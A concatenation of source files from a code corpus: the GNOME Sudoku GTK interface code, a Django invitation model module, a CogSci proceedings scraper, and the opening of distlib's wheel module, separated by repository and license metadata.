('Print', Gtk.STOCK_PRINT, _('_Print...'), '<Control>p', None, self.print_game),
('PrintMany', Gtk.STOCK_PRINT, _('Print _Multiple Sudokus...'), None,
None, self.print_multiple_games),
('Close', Gtk.STOCK_CLOSE, None, '<Control>w', None, self.quit_cb),
('Settings', None, _('_Settings')),
('FullScreen', Gtk.STOCK_FULLSCREEN, None, 'F11', None, self.full_screen_cb),
('Tools', None, _('_Tools')),
('ShowPossible', Gtk.STOCK_DIALOG_INFO, _('_Hint'), '<Control>h',
_('Show a square that is easy to fill.'), self.show_hint_cb),
('ClearTopNotes', None, _('Clear _Top Notes'), '<Control>j',
None, self.clear_top_notes_cb),
('ClearBottomNotes', None, _('Clear _Bottom Notes'), '<Control>k',
None, self.clear_bottom_notes_cb),
('Help', None, _('_Help'), None, None, None),
('ShowHelp', Gtk.STOCK_HELP, _('_Contents'), 'F1', None, self.show_help),
('About', Gtk.STOCK_ABOUT, None, None, None, self.show_about),
])
self.main_actions.add_toggle_actions([
('AlwaysShowPossible',
None,
_('Show _Possible Numbers'),
None,
_('Always show possible numbers in a square'),
self.auto_hint_cb),
('ShowImpossibleImplications',
None,
_('Warn About _Unfillable Squares'),
None,
_('Warn about squares made unfillable by a move'),
self.impossible_implication_cb),
('Tracker', 'tracks', _('_Track Additions'),
'<Control>T',
_('Mark new additions in a separate color so you can keep track of them.'),
self.tracker_toggle_cb, False),
('ToggleToolbar', None, _('Show _Toolbar'), None, None, self.toggle_toolbar_cb, True),
('ToggleHighlight', Gtk.STOCK_SELECT_COLOR, _('_Highlighter'),
None, _('Highlight the current row, column and box'), self.toggle_highlight_cb, False)
])
self.main_actions.get_action('Undo').set_is_important(True)
self.main_actions.get_action('Redo').set_is_important(True)
self.main_actions.get_action('ShowPossible').set_is_important(True)
self.main_actions.get_action('Tracker').set_is_important(True)
self.uimanager.insert_action_group(self.main_actions, 0)
self.uimanager.add_ui_from_string(self.ui)
def setup_undo (self):
self.cleared = [] # used for Undo memory
self.cleared_notes = [] # used for Undo memory
# Set up our UNDO stuff
undo_widg = self.main_actions.get_action('Undo')
redo_widg = self.main_actions.get_action('Redo')
self.history = Undo.UndoHistoryList(undo_widg, redo_widg)
for entry in self.gsd.__entries__.values():
Undo.UndoableGenericWidget(entry, self.history,
set_method = 'set_value_for_undo',
get_method = 'get_value_for_undo',
pre_change_signal = 'value-about-to-change'
)
Undo.UndoableGenericWidget(entry, self.history,
set_method = 'set_notes_for_undo',
get_method = 'get_notes_for_undo',
signal = 'notes-changed',
pre_change_signal = 'notes-about-to-change',
)
def setup_color (self):
# setup background colors
bgcol = self.gconf['bg_color']
if bgcol != '':
self.gsd.set_bg_color(bgcol)
def setup_autosave (self):
GObject.timeout_add_seconds(self.gconf['auto_save_interval'] or 60, # in seconds...
self.autosave)
def setup_main_boxes (self):
self.vb = Gtk.VBox()
# Add menu bar and toolbar...
mb = self.uimanager.get_widget('/MenuBar')
mb.show()
self.vb.pack_start(mb, False, False, 0)
self.tb = self.uimanager.get_widget('/Toolbar')
self.tb.get_style_context().add_class(Gtk.STYLE_CLASS_PRIMARY_TOOLBAR)
self.vb.pack_start(self.tb, False, False, 0)
self.main_area = Gtk.HBox()
self.swallower = dialog_swallower.SwappableArea(self.main_area)
self.swallower.show()
self.vb.pack_start(self.swallower, True, True, 12)
self.main_area.pack_start(self.gsd, True, True, 6)
self.main_actions.set_visible(True)
self.game_box = Gtk.VBox()
self.main_area.show()
self.vb.show()
self.game_box.show()
self.main_area.pack_start(self.game_box, False, False, 12)
self.w.add(self.vb)
def setup_toggles (self):
# sync up toggles with gconf values...
map(lambda tpl: self.gconf_wrap_toggle(*tpl),
[('always_show_hints',
self.main_actions.get_action('AlwaysShowPossible')),
('show_impossible_implications',
self.main_actions.get_action('ShowImpossibleImplications')),
('show_toolbar',
self.main_actions.get_action('ToggleToolbar')),
('highlight',
self.main_actions.get_action('ToggleHighlight')),
('show_tracker',
self.main_actions.get_action('Tracker')),
])
@simple_debug
def start_worker_thread (self, *args):
n_new_puzzles = self.sudoku_maker.n_puzzles(new = True)
try:
if n_new_puzzles < self.gconf['minimum_number_of_new_puzzles']:
self.worker = threading.Thread(target = lambda *args: self.sudoku_maker.work(limit = 5))
self.worker_connections = [
self.timer.connect('timing-started', self.sudoku_maker.resume),
self.timer.connect('timing-stopped', self.sudoku_maker.pause)
]
self.worker.start()
except gconf_wrapper.GConfError:
pass # assume we have enough new puzzles
return True
@simple_debug
def stop_worker_thread (self, *args):
if hasattr(self, 'worker'):
self.sudoku_maker.stop()
for c in self.worker_connections:
self.timer.disconnect(c)
def stop_dancer (self, *args):
if hasattr(self, 'dancer'):
self.dancer.stop_dancing()
delattr(self, 'dancer')
def start_dancer (self):
import dancer
self.dancer = dancer.GridDancer(self.gsd)
self.dancer.start_dancing()
@simple_debug
def you_win_callback (self, grid):
if hasattr(self, 'dancer'):
return
self.won = True
# increase difficulty for next time.
self.gconf['difficulty'] = self.gconf['difficulty'] + 0.1
self.timer.finish_timing()
self.sudoku_tracker.finish_game(self)
if self.timer.active_time < 60:
seconds = int(self.timer.active_time)
sublabel = ngettext("You completed the puzzle in %d second",
"You completed the puzzle in %d seconds", seconds) % seconds
elif self.timer.active_time < 3600:
minutes = int(self.timer.active_time / 60)
seconds = int(self.timer.active_time - minutes*60)
minute_string = ngettext("%d minute", "%d minutes", minutes) % minutes
second_string = ngettext("%d second", "%d seconds", seconds) % seconds
sublabel = _("You completed the puzzle in %(minute)s and %(second)s") % {'minute': minute_string, 'second': second_string}
else:
hours = int(self.timer.active_time / 3600)
minutes = int((self.timer.active_time - hours*3600) / 60)
seconds = int(self.timer.active_time - hours*3600 - minutes*60)
hour_string = ngettext("%d hour", "%d hours", hours) % hours
minute_string = ngettext("%d minute", "%d minutes", minutes) % minutes
second_string = ngettext("%d second", "%d seconds", seconds) % seconds
sublabel = _("You completed the puzzle in %(hour)s, %(minute)s and %(second)s") % {'hour': hour_string, 'minute': minute_string, 'second': second_string}
sublabel += "\n"
sublabel += ngettext("You got %(n)s hint.", "You got %(n)s hints.", self.gsd.hints) % {'n':self.gsd.hints}
sublabel += "\n"
if self.gsd.impossible_hints:
sublabel += ngettext("You had %(n)s impossibility pointed out.",
"You had %(n)s impossibilities pointed out.",
self.gsd.impossible_hints) % {'n':self.gsd.impossible_hints}
sublabel += "\n"
self.start_dancer()
dialog_extras.show_message_dialog(_("You win!"), label = _("You win!"),
sublabel = sublabel
)
@simple_debug
def initialize_prefs (self):
for k, v in self.initial_prefs.items():
try:
self.gconf[k]
except:
self.gconf[k] = v
@simple_debug
@inactivate_new_game_etc
def new_cb (self, *args):
if (self.gsd.grid and self.gsd.grid.is_changed() and not self.won):
try:
if dialog_extras.show_boolean_dialog(
label = _("Save this game before starting new one?"),
custom_yes = _("_Save game for later"),
custom_no = _("_Abandon game"),
):
self.save_game()
else:
self.sudoku_tracker.abandon_game(self)
except dialog_extras.UserCancelledError:
# User cancelled new game
return
self.do_stop()
self.select_game()
@simple_debug
def stop_game (self):
if (self.gsd.grid
and self.gsd.grid.is_changed()
and (not self.won)):
try:
if dialog_extras.show_boolean_dialog(label = _("Save game before closing?")):
self.save_game(self)
except dialog_extras.UserCancelledError:
return
self.do_stop()
def do_stop (self):
self.stop_dancer()
self.gsd.grid = None
self.tracker_ui.reset()
self.history.clear()
self.won = False
self.old_tracker_view = None
@simple_debug
def resize_cb (self, widget, event, user_data=None):
self.gconf['width'] = event.width
self.gconf['height'] = event.height
@simple_debug
def quit_cb (self, *args):
self.w.hide()
if (self.gsd.grid
and self.gsd.grid.is_changed()
and (not self.won)):
self.save_game(self)
if Gtk.main_level() > 1:
# If we are in an embedded mainloop, that means that one
# of our "swallowed" dialogs is active, in which case we
# have to quit that mainloop before we can quit
# properly.
if self.swallower.running:
d = self.swallower.running
d.response(Gtk.ResponseType.DELETE_EVENT)
Gtk.main_quit() # Quit the embedded mainloop
GObject.idle_add(self.quit_cb, 100) # Call ourselves again
# to quit the main
# mainloop
return
# make sure we really go away before doing our saving --
# otherwise we appear sluggish.
while Gtk.events_pending():
Gtk.main_iteration()
self.stop_worker_thread()
# allow KeyboardInterrupts, which calls quit_cb outside the main loop
try:
Gtk.main_quit()
except RuntimeError:
pass
@simple_debug
def save_game (self, *args):
self.sudoku_tracker.save_game(self)
def full_screen_cb (self, *args):
if self.is_fullscreen:
self.w.unfullscreen()
self.is_fullscreen = False
else:
self.w.fullscreen()
self.is_fullscreen = True
@simple_debug
def game_reset_cb (self, *args):
clearer = Undo.UndoableObject(
self.do_game_reset, #action
self.undo_game_reset, #inverse
self.history #history
)
clearer.perform()
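
    # Pattern note: Undo.UndoableObject pairs an action with its inverse; perform()
    # runs the action and records it on self.history, so a later undo invokes the
    # inverse (here undo_game_reset). The note-clearing callbacks below reuse it.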
def do_game_reset (self, *args):
self.gsd.cover_track()
self.cleared.append(self.tinfo.save())
self.cleared.append(self.gsd.reset_grid())
self.cleared_notes.append((tracker_info.NO_TRACKER, self.gsd.clear_notes('All')))
self.tinfo.reset()
self.stop_dancer()
def undo_game_reset (self, *args):
self.tracker_ui.select_tracker(tracker_info.NO_TRACKER)
for entry in self.cleared.pop():
self.gsd.add_value(*entry)
self.tinfo.load(self.cleared.pop())
self.tracker_ui.select_tracker(self.tinfo.current_tracker)
self.gsd.show_track()
self.undo_clear_notes()
def clear_top_notes_cb (self, *args):
clearer = Undo.UndoableObject(
lambda *args: self.do_clear_notes('Top'), #action
self.undo_clear_notes, #inverse
self.history
)
clearer.perform()
def clear_bottom_notes_cb (self, *args):
clearer = Undo.UndoableObject(
lambda *args: self.do_clear_notes('Bottom'), #action
self.undo_clear_notes, #inverse
self.history
)
clearer.perform()
def do_clear_notes(self, side):
''' Clear top, bottom, or all notes - in undoable fashion
The side argument is used to specify which notes are to be cleared.
'Top' - Clear only the top notes
'Bottom' - Clear only the bottom notes
'''
self.cleared_notes.append((self.tinfo.current_tracker, self.gsd.clear_notes(side)))
# Turn off auto-hint if the player clears the bottom notes
if side == 'Bottom' and self.gconf['always_show_hints']:
always_show_hint_wdgt = self.main_actions.get_action('AlwaysShowPossible')
always_show_hint_wdgt.activate()
# Update the hints...in case we're redoing a clear of them
if self.gconf['always_show_hints']:
self.gsd.update_all_hints()
def undo_clear_notes(self):
''' Undo previously cleared notes
Clearing notes fills the cleared_notes list of notes that were cleared.
'''
cleared_tracker, cleared_notes = self.cleared_notes.pop()
# Change the tracker selection if it was tracking during the clear
if cleared_tracker != tracker_info.NO_TRACKER:
self.tracker_ui.select_tracker(cleared_tracker)
self.gsd.apply_notelist(cleared_notes)
# Update the hints...in case we're undoing over top of them
if self.gconf['always_show_hints']:
self.gsd.update_all_hints()
# Redraw the notes
self.gsd.update_all_notes()
# Make sure we're still dancing if we undo after win
if self.gsd.grid.check_for_completeness():
self.start_dancer()
@simple_debug
def show_hint_cb (self, *args):
self.gsd.show_hint()
@simple_debug
def auto_hint_cb (self, action, user_data=None):
if action.get_active():
self.gsd.always_show_hints = True
self.gsd.update_all_hints()
else:
self.gsd.always_show_hints = False
self.gsd.clear_notes('AutoHint')
@simple_debug
def impossible_implication_cb (self, action, user_data=None):
if action.get_active():
self.gsd.display_impossible_implications()
else:
self.gsd.hide_impossible_implications()
@simple_debug
def setup_tracker_interface (self):
self.tracker_ui = TrackerBox(self)
self.tracker_ui.show_all()
self.tracker_ui.hide()
self.tinfo = tracker_info.TrackerInfo()
self.old_tracker_view = None
self.game_box.add(self.tracker_ui)
@simple_debug
def tracker_toggle_cb (self, widg, user_data=None):
if widg.get_active():
if self.old_tracker_view:
self.tinfo.set_tracker_view(self.old_tracker_view)
self.tracker_ui.select_tracker(self.tinfo.current_tracker)
self.gsd.show_track()
self.tracker_ui.show_all()
else:
self.old_tracker_view = self.tinfo.get_tracker_view()
self.tracker_ui.hide_tracker_cb(None)
self.tracker_ui.hide()
@simple_debug
def toggle_toolbar_cb (self, widg, user_data=None):
if widg.get_active():
self.tb.show()
else:
self.tb.hide()
def toggle_highlight_cb (self, widg, user_data=None):
if widg.get_active():
self.gsd.toggle_highlight(True)
else:
self.gsd.toggle_highlight(False)
@simple_debug
def show_info_cb (self, *args):
if not self.gsd.grid:
dialog_extras.show_message_dialog(parent = self.w,
title = _("Puzzle Information"),
label = _("There is no current puzzle.")
)
return
puzzle = self.gsd.grid.virgin.to_string()
diff = self.sudoku_maker.get_difficulty(puzzle)
information = _("Calculated difficulty: ")
try:
information += {'easy': _('Easy'),
'medium': _('Medium'),
'hard': _('Hard'),
'very hard': _('Very Hard')}[diff.value_category()]
except KeyError:
information += diff.value_category()
information += " (%1.2f)" % diff.value
information += "\n"
information += _("Number of moves instantly fillable by elimination: ")
information += str(int(diff.instant_elimination_fillable))
information += "\n"
information += _("Number of moves instantly fillable by filling: ")
information += str(int(diff.instant_fill_fillable))
information += "\n"
information += _("Amount of trial-and-error required to solve: ")
information += str(len(diff.guesses))
dialog_extras.show_message_dialog(parent = self.w,
title = _("Puzzle Statistics"),
label = _("Puzzle Statistics"),
sublabel = information)
@simple_debug
def autosave (self):
# this is called on a regular loop and will autosave if we
# have reason to...
if self.gsd.grid and self.gsd.grid.is_changed() and not self.won:
self.sudoku_tracker.save_game(self)
return True
@simple_debug
def show_about (self, *args):
about = Gtk.AboutDialog(
transient_for=self.w,
program_name=APPNAME,
version=VERSION,
copyright=COPYRIGHT,
license_type=Gtk.License.GPL_2_0,
comments=DESCRIPTION,
authors=AUTHORS,
website=WEBSITE,
website_label=WEBSITE_LABEL,
logo_icon_name="gnome-sudoku",
translator_credits=_("translator-credits"))
about.connect("response", lambda d, r: d.destroy())
about.show()
@simple_debug
def show_help (self, *args):
try:
Gtk.show_uri(self.w.get_screen(), "ghelp:gnome-sudoku", Gtk.get_current_event_time())
except GObject.GError, error:
# FIXME: This should create a pop-up dialog
print _('Unable to display help: %s') % str(error)
@simple_debug
def print_game (self, *args):
printing.print_sudokus([self.gsd], self.w)
@simple_debug
def print_multiple_games (self, *args):
gp = printing.GamePrinter(self.sudoku_maker, self.gconf)
gp.run_dialog()
class TrackerBox (Gtk.VBox):
@simple_debug
def __init__ (self, main_ui):
GObject.GObject.__init__(self)
self.footprint_img = cairo.ImageSurface.create_from_png(
os.path.join(IMAGE_DIR, "footprints.png"))
self.builder = Gtk.Builder()
self.builder.set_translation_domain(DOMAIN)
self.builder.add_from_file(os.path.join(UI_DIR, 'tracker.ui'))
self.main_ui = main_ui
self.tinfo = tracker_info.TrackerInfo()
self.tinfo.ui = self
self.vb = self.builder.get_object('vbox1')
self.vb.unparent()
self.pack_start(self.vb, True, True, 0)
self.setup_actions()
self.setup_tree()
self.show_all()
@simple_debug
def reset (self):
for tree in self.tracker_model:
if tree[0] > -1:
self.tracker_model.remove(tree.iter)
self.tinfo.reset()
self.tracker_actions.set_sensitive(False)
@simple_debug
def setup_tree (self):
self.tracker_tree = self.builder.get_object('TrackerTreeView')
self.tracker_model = Gtk.ListStore(int, GdkPixbuf.Pixbuf, str)
self.tracker_model.set_sort_column_id(0, Gtk.SortType.ASCENDING)
self.tracker_tree.set_model(self.tracker_model)
col1 = Gtk.TreeViewColumn("", Gtk.CellRendererPixbuf(), pixbuf = 1)
rend = Gtk.CellRendererText()
col2 = Gtk.TreeViewColumn("", rend, text = 2)
col2.set_cell_data_func(rend, self.draw_tracker_name)
self.tracker_tree.append_column(col2)
self.tracker_tree.append_column(col1)
# Our initial row...
pixbuf = self.get_tracker_pixbuf(
(0, 0, 0)
)
self.tracker_model.append([-1, pixbuf, _('Untracked')])
self.tracker_tree.get_selection().connect('changed', self.selection_changed_cb)
@simple_debug
def setup_actions (self):
self.tracker_actions = Gtk.ActionGroup('tracker_actions')
self.tracker_actions.add_actions(
[('Remove',
Gtk.STOCK_CLEAR,
_('_Remove'),
None, _('Delete selected tracker.'),
self.remove_tracker_cb
),
('Hide',
Gtk.STOCK_CLEAR,
_('H_ide'),
None, _('Hide current tracker entries.'),
self.hide_tracker_cb
),
('Apply',
Gtk.STOCK_APPLY,
_('A_pply'),
None, _('Apply all tracked values and remove the tracker.'),
self.apply_tracker_cb
),
]
)
o = self.builder.get_object('RemoveTrackerButton')
o.set_related_action(self.tracker_actions.get_action('Remove'))
o = self.builder.get_object('HideTrackerButton')
o.set_related_action(self.tracker_actions.get_action('Hide'))
o = self.builder.get_object('ApplyTrackerButton')
o.set_related_action(self.tracker_actions.get_action('Apply'))
self.builder.get_object('AddTrackerButton').connect('clicked',
self.add_tracker)
# Default to insensitive (they only become sensitive once a tracker is added)
self.tracker_actions.set_sensitive(False)
def draw_tracker_name(self, column, cell, model, iter, user_data=None):
if model.get_value(iter, 0) == self.tinfo.showing_tracker:
cell.set_property('weight', Pango.Weight.BOLD)
else:
cell.set_property('weight', Pango.Weight.NORMAL)
@simple_debug
def add_tracker (self, *args, **keys):
if keys and 'tracker_id' in keys:
tracker_id = self.tinfo.create_tracker(keys['tracker_id'])
else:
tracker_id = self.tinfo.create_tracker()
pixbuf = self.get_tracker_pixbuf(
self.tinfo.get_color(tracker_id)
)
# select our new tracker
self.tracker_tree.get_selection().select_iter(
self.tracker_model.append([tracker_id,
pixbuf,
_("Tracker %s") % (tracker_id + 1)]
)
)
self.tinfo.set_tracker(tracker_id)
@simple_debug
def get_tracker_pixbuf (self, color):
surface = cairo.ImageSurface (cairo.FORMAT_ARGB32, 64, 64)
cr = cairo.Context(surface)
cr.set_source_rgb(*color)
cr.mask_surface(self.footprint_img, 0, 0)
cr.fill()
return Gdk.pixbuf_get_from_surface(surface, 0, 0, 64, 64)
@simple_debug
def find_tracker (self, tracker_id):
for row in self.tracker_model:
if row[0] == tracker_id:
return row
return None
@simple_debug
def select_tracker (self, tracker_id):
track_row = self.find_tracker(tracker_id)
if track_row:
self.tracker_tree.get_selection().select_iter(track_row.iter)
self.tinfo.set_tracker(tracker_id)
def redraw_row(self, tracker_id):
track_row = self.find_tracker(tracker_id)
if track_row:
self.tracker_model.row_changed(self.tracker_model.get_path(track_row.iter), track_row.iter)
def set_tracker_action_sense(self, enabled):
self.tracker_actions.set_sensitive(True)
for action in self.tracker_actions.list_actions():
action.set_sensitive(enabled)
@simple_debug
def selection_changed_cb (self, selection, user_data=None):
mod, itr = selection.get_selected()
if itr:
selected_tracker_id = mod.get_value(itr, 0)
else:
selected_tracker_id = tracker_info.NO_TRACKER
if selected_tracker_id != tracker_info.NO_TRACKER:
self.main_ui.gsd.cover_track()
# Remove the underline on the showing_tracker
self.redraw_row(self.tinfo.showing_tracker)
self.tinfo.set_tracker(selected_tracker_id)
self.set_tracker_action_sense(self.tinfo.showing_tracker != tracker_info.NO_TRACKER)
# Show the tracker
if selected_tracker_id != tracker_info.NO_TRACKER:
self.main_ui.gsd.show_track()
self.main_ui.gsd.update_all_notes()
if self.main_ui.gconf['always_show_hints']:
self.main_ui.gsd.update_all_hints()
@simple_debug
def remove_tracker_cb (self, action, user_data=None):
mod, itr = self.tracker_tree.get_selection().get_selected()
# This should only be called if there is an itr, but we'll
# double-check just in case.
if itr:
clearer = Undo.UndoableObject(
self.do_delete_tracker,
self.undo_delete_tracker,
self.main_ui.history
)
clearer.perform()
@simple_debug
def hide_tracker_cb (self, action, user_data=None):
hiding_tracker = self.tinfo.showing_tracker
self.select_tracker(tracker_info.NO_TRACKER)
self.main_ui.gsd.cover_track(True)
self.main_ui.gsd.update_all_notes()
self.set_tracker_action_sense(False)
self.redraw_row(hiding_tracker)
self.redraw_row(tracker_info.NO_TRACKER)
@simple_debug
def apply_tracker_cb (self, action, user_data=None):
'''Apply Tracker button action
'''
# Shouldn't be here if no tracker is showing
if self.tinfo.showing_tracker == tracker_info.NO_TRACKER:
return
# Apply the tracker in undo-able fashion
applyer = Undo.UndoableObject(
self.do_apply_tracker,
self.undo_apply_tracker,
self.main_ui.history
)
applyer.perform()
def do_apply_tracker(self):
'''Apply the showing tracker to untracked
All of the values and notes will be transferred to untracked and
the tracker is deleted.
'''
track_row = self.find_tracker(self.tinfo.showing_tracker)
if not track_row:
return
# Delete the tracker
cleared_values, cleared_notes = self.do_delete_tracker(True)
# Apply the values
for x, y, val, tid in cleared_values:
self.main_ui.gsd.set_value(x, y, val)
# Then apply the notes
self.main_ui.gsd.apply_notelist(cleared_notes, True)
# Store the undo counts
self.main_ui.cleared.append(len(cleared_values))
self.main_ui.cleared_notes.append(len(cleared_notes))
def undo_apply_tracker(self):
'''Undo a previous tracker apply
The number of cleared values and notes are stored during the apply.
The undo is called for each of them, then the tracker delete is
undone.
'''
# Undo all of the applied values and notes
value_count = self.main_ui.cleared.pop()
note_count = self.main_ui.cleared_notes.pop()
count = 0
while count < (value_count + note_count):
self.main_ui.history.undo()
count += 1
# Undo the tracker delete
self.undo_delete_tracker()
def do_delete_tracker(self, for_apply = False):
'''Delete the current tracker
'''
track_row = self.find_tracker(self.tinfo.showing_tracker)
if not track_row:
return
ui_row = [track_row[0], track_row[1], track_row[2]]
# For the values, store (tracker_id, ui_row, list_of_cleared_values)
cleared_values = self.main_ui.gsd.delete_by_tracker()
self.main_ui.cleared.append((self.tinfo.showing_tracker, ui_row, cleared_values))
# The notes already have tracker info in them, so just store the list
cleared_notes = self.main_ui.gsd.clear_notes(tracker = self.tinfo.showing_tracker)
self.main_ui.cleared_notes.append(cleared_notes)
# Delete it from tracker_info
self.hide_tracker_cb(None)
self.tracker_model.remove(track_row.iter)
self.tinfo.delete_tracker(ui_row[0])
# Return all of the data for "Apply Tracker" button
if for_apply:
return (cleared_values, cleared_notes)
def undo_delete_tracker(self):
'''Undo a tracker delete
'''
# Values are stored as (tracker_id, ui_row, list_of_cleared_values)
tracker_id, ui_row, cleared_values = self.main_ui.cleared.pop()
# Recreate it in tracker_info
self.tinfo.create_tracker(tracker_id)
# Add it to the tree
self.tracker_tree.get_selection().select_iter(self.tracker_model.append(ui_row))
# Add all the values
for value in cleared_values:
self.main_ui.gsd.add_value(*value)
# The notes already have tracker info in them, so just re-apply the list
self.main_ui.gsd.apply_notelist(self.main_ui.cleared_notes.pop())
def start_game ():
if options.debug:
print 'Starting GNOME Sudoku in debug mode'
## You must call g_thread_init() before executing any other GLib
## functions in a threaded GLib program.
GObject.threads_init()
if options.profile:
options.profile = False
profile_me()
return
u = UI()
if not u.quit:
try:
Gtk.main()
except KeyboardInterrupt:
# properly quit on a keyboard interrupt...
u.quit_cb()
def profile_me ():
print 'Profiling GNOME Sudoku'
import tempfile, hotshot, hotshot.stats
pname = os.path.join(tempfile.gettempdir(), 'GNOME_SUDOKU_HOTSHOT_PROFILE')
prof = hotshot.Profile(pname)
prof.runcall(start_game)
stats = hotshot.stats.load(pname)
stats.strip_dirs()
stats.sort_stats('time', 'calls').print_stats()
| gpl-3.0 |
emorozov/django-basic-apps | basic/invitations/models.py | 10 | 2238 | import random
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.sites.models import Site
from django.utils.hashcompat import sha_constructor
INVITATION_ALLOTMENT = getattr(settings, 'INVITATION_ALLOTMENT', 5)
INVITATION_STATUS_SENT = 0
INVITATION_STATUS_ACCEPTED = 1
INVITATION_STATUS_DECLINED = 2
INVITATION_STATUS_CHOICES = (
(INVITATION_STATUS_SENT, 'Sent'),
(INVITATION_STATUS_ACCEPTED, 'Accepted'),
(INVITATION_STATUS_DECLINED, 'Declined'),
)
class InvitationManager(models.Manager):
def get_invitation(self, token):
try:
return self.get(token=token, status=INVITATION_STATUS_SENT)
except self.model.DoesNotExist:
return False
def create_token(self, email):
salt = sha_constructor(str(random.random())).hexdigest()[:5]
token = sha_constructor(salt+email).hexdigest()
return token
class Invitation(models.Model):
""" Invitation model """
from_user = models.ForeignKey(User)
token = models.CharField(max_length=40)
name = models.CharField(blank=True, max_length=100)
email = models.EmailField()
message = models.TextField(blank=True)
status = models.PositiveSmallIntegerField(choices=INVITATION_STATUS_CHOICES, default=0)
site = models.ForeignKey(Site, default=settings.SITE_ID)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
objects = InvitationManager()
def __unicode__(self):
return '<Invite>'
@models.permalink
def get_absolute_url(self):
return ('invitations:invitation', [self.token])
class InvitationAllotment(models.Model):
""" InvitationAllotment model """
user = models.OneToOneField(User, related_name='invitation_allotment')
amount = models.IntegerField(default=INVITATION_ALLOTMENT)
site = models.ForeignKey(Site, default=settings.SITE_ID)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
def __unicode__(self):
return '<Invitation Allotment>'
def decrement(self, amount=1):
self.amount = self.amount - amount
self.save()
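# Illustrative usage sketch (not part of the original module) showing
# how the manager methods and models above fit together; request.user
# and the email value are placeholders:
#
# def send_invitation(request, email):
# token = Invitation.objects.create_token(email)
# return Invitation.objects.create(
# from_user=request.user, token=token, email=email)
#
# def accept_invitation(token):
# invitation = Invitation.objects.get_invitation(token)
# if invitation: # get_invitation returns False when nothing matches
# invitation.status = INVITATION_STATUS_ACCEPTED
# invitation.save()
# invitation.from_user.invitation_allotment.decrement()
# return invitation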
| bsd-3-clause |
jhamrick/cogsci-proceedings-analysis | scraper.py | 1 | 2997 | import urllib2
import pandas as pd
from bs4 import BeautifulSoup, element
def load_html(url):
response = urllib2.urlopen(url)
html = response.read().replace("&nbsp;", "") # strip non-breaking space entities
return html
def get_papers_table(year):
url = "https://mindmodeling.org/cogsci{}/".format(year)
soup = BeautifulSoup(load_html(url))
tables = soup.find_all("table")
tds = tables[5].find_all("td")
tds = [td for td in tds if len(td.contents) > 0]
paper_type = None
papers = []
paper = {}
for td in tds:
elem = td.contents[0]
if isinstance(elem, element.NavigableString):
paper['authors'] = unicode(elem)
paper['year'] = year
paper['section'] = paper_type
papers.append(paper)
paper = {}
elif elem.name == 'a':
href = url + elem.attrs['href']
title = "".join(elem.contents)
paper['url'] = href
paper['title'] = title
elif elem.name == 'h2':
section_name, = elem.contents
paper_type = section_name.strip()
return pd.DataFrame(papers)
def get_papers_list(year):
url = "https://mindmodeling.org/cogsci{}/".format(year)
html = load_html(url)
html = html.replace("<li>", "").replace("<li id=session>", "")
soup = BeautifulSoup(html)
papers = []
paper = {}
paper_type = None
for elem in soup.findAll("a"):
if not isinstance(elem.contents[0], element.NavigableString):
continue
sibling = elem.findNextSibling()
if not hasattr(sibling, "name"):
continue
if sibling.name != "ul":
continue
toplevel = elem.findParent().findParent()
break
for section in toplevel.contents:
if isinstance(section, element.NavigableString):
paper_type = section.strip()
continue
for elem in section.find_all("a"):
href = url + elem.attrs['href']
try:
title = "".join(elem.contents)
except TypeError:
continue
paper = {}
paper['year'] = year
paper['url'] = href
paper['title'] = title
paper['section'] = paper_type
sibling = elem.findNextSibling()
authors, = sibling.contents
paper['authors'] = unicode(authors)
papers.append(paper)
return pd.DataFrame(papers)
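# Rough shape of the markup the walk above assumes (reconstructed here
# for illustration only; the live pages may differ in detail):
#
# <ul>
# Talk Session Name <- bare NavigableString: paper_type
# <a href="papers/0001/">Paper Title</a> <- href and title
# <ul>Author One, Author Two</ul> <- findNextSibling(): authors
# </ul>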
def get_papers():
papers = pd.concat([
get_papers_table(2014),
get_papers_list(2013),
get_papers_list(2012),
get_papers_list(2011),
get_papers_list(2010)
])
papers = papers\
.set_index('url')\
.sort()
if papers.isnull().any().any():
raise RuntimeError("some entries are null")
return papers
if __name__ == "__main__":
pathname = "cogsci_proceedings_raw.csv"
papers = get_papers()
papers.to_csv(pathname, encoding='utf-8')
| mit |
xyuanmu/XX-Net | python3.8.2/Lib/site-packages/pip/_vendor/distlib/wheel.py | 17 | 40437 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2017 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
from __future__ import unicode_literals
import base64
import codecs
import datetime
import distutils.util
from email import message_from_file
import hashlib
import imp
import json
import logging
import os
import posixpath
import re
import shutil
import sys
import tempfile
import zipfile
from . import __version__, DistlibException
from .compat import sysconfig, ZipFile, fsdecode, text_type, filter
from .database import InstalledDistribution
from .metadata import Metadata, METADATA_FILENAME, WHEEL_METADATA_FILENAME
from .util import (FileOperator, convert_path, CSVReader, CSVWriter, Cache,
cached_property, get_cache_base, read_exports, tempdir)
from .version import NormalizedVersion, UnsupportedVersionError
logger = logging.getLogger(__name__)
cache = None # created when needed
if hasattr(sys, 'pypy_version_info'): # pragma: no cover
IMP_PREFIX = 'pp'
elif sys.platform.startswith('java'): # pragma: no cover
IMP_PREFIX = 'jy'
elif sys.platform == 'cli': # pragma: no cover
IMP_PREFIX = 'ip'
else:
IMP_PREFIX = 'cp'
VER_SUFFIX = sysconfig.get_config_var('py_version_nodot')
if not VER_SUFFIX: # pragma: no cover
VER_SUFFIX = '%s%s' % sys.version_info[:2]
PYVER = 'py' + VER_SUFFIX
IMPVER = IMP_PREFIX + VER_SUFFIX
ARCH = distutils.util.get_platform().replace('-', '_').replace('.', '_')
ABI = sysconfig.get_config_var('SOABI')
if ABI and ABI.startswith('cpython-'):
ABI = ABI.replace('cpython-', 'cp')
else:
def _derive_abi():
parts = ['cp', VER_SUFFIX]
if sysconfig.get_config_var('Py_DEBUG'):
parts.append('d')
if sysconfig.get_config_var('WITH_PYMALLOC'):
parts.append('m')
if sysconfig.get_config_var('Py_UNICODE_SIZE') == 4:
parts.append('u')
return ''.join(parts)
ABI = _derive_abi()
del _derive_abi
FILENAME_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?
-(?P<py>\w+\d+(\.\w+\d+)*)
-(?P<bi>\w+)
-(?P<ar>\w+(\.\w+)*)
\.whl$
''', re.IGNORECASE | re.VERBOSE)
